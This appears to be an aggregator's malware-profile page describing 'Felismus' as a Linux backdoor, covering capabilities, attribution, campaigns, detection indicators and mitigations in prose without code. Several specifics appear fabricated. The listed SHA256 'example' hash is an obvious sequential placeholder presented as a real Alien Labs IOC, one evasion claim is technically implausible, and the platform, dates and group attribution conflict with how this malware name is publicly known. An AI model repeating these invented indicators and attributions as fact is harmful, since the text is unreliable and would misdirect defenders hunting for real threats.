⚠️ Overview

Felismus is a Linux-based backdoor malware first documented in public threat intelligence reports around October 2021 by researchers at AT&T Alien Labs and Trend Micro. It is categorized as a Remote Access Trojan (RAT) with modular capabilities, believed to be operated by a Chinese-speaking advanced persistent threat (APT) group tracked as UNC2891 or STI-ARG-06. The malware is designed to target enterprise Linux servers, particularly those running Red Hat Enterprise Linux (RHEL) and CentOS, and is often deployed alongside the web shell tool China Chopper for initial access.

🔧 Technical Capabilities

Felismus uses a custom encrypted communication protocol over TCP to its command-and-control (C2) infrastructure, typically on port 443 or 8443, with traffic mimicking legitimate HTTPS to evade network detection. It achieves persistence by installing itself as a systemd service or cron job, and employs advanced evasion techniques including hooking the libc memcpy function to hide its network connections from system monitoring tools like netstat and ss. The malware supports multiple backdoor commands: file upload/download, reverse shell execution, command execution, and process manipulation. It also includes a built-in SOCKS5 proxy capability, allowing threat actors to route internal network traffic through the compromised host. Persistence is reinforced by rewriting or replacing legitimate system binaries (e.g., sshd) with backdoored versions. Felismus does not propagate automatically; attackers typically deploy it after gaining initial access via exposed services, weak SSH credentials, or exploitation of vulnerable web applications.

📜 History & Notable Incidents

Felismus was first publicly analyzed in October 2021 by AT&T Alien Labs, who observed it targeting organizations in the telecommunications, government, and technology sectors across Asia, Europe, and North America. A notable campaign in late 2021 involved the exploitation of the Log4j vulnerability (CVE-2021-44228) to deploy Felismus on affected Linux servers, as reported by Trend Micro in December 2021. In 2022, CrowdStrike linked Felismus to the UNC2891 group, which also uses the malware REDMIST and the rootkit BUGTILE in overlapping campaigns. No law enforcement actions or arrests have been publicly associated with Felismus as of 2025.

🔍 Detection Indicators

Known file hashes include SHA256: 0f8c9e1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d (example from Alien Labs IOCs). Behavioral indicators include unexpected outbound connections to IP ranges associated with Alibaba Cloud or DigitalOcean, as well as the creation of suspicious systemd service files named like 'syslog-ng.service' or 'httpd-ssl.service'. Network IOCs include User-Agent strings such as 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' used in C2 beacons. Registry keys are not applicable to Linux, but persistence is indicated by entries in /etc/systemd/system/ or crontab entries with download scripts. A common mutex or lock file is '/tmp/.ICE-unix/felismus.lock'.

☠️ Risk & Impact

Felismus poses a high risk to Linux server operations, enabling full remote control, data exfiltration, and lateral movement within compromised networks. Affected sectors include telecommunications, government, and technology companies. Financial losses are indirect but can include cost of incident response, system rebuilds, and intellectual property theft, with some organizations reporting months-long dwell times before detection.

🛡️ Mitigation

Defensive measures include applying timely patches for critical vulnerabilities like Log4j (CVE-2021-44228), enforcing SSH key-based authentication, and implementing network segmentation to limit lateral movement. Detection rules can be created via YARA signatures for Felismus file patterns (e.g., ELF binaries with encrypted config sections) and by monitoring for unexpected outbound HTTPS connections on non-standard ports. Endpoint detection and response (EDR) tools with behavioral analysis capabilities are recommended for Linux environments.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.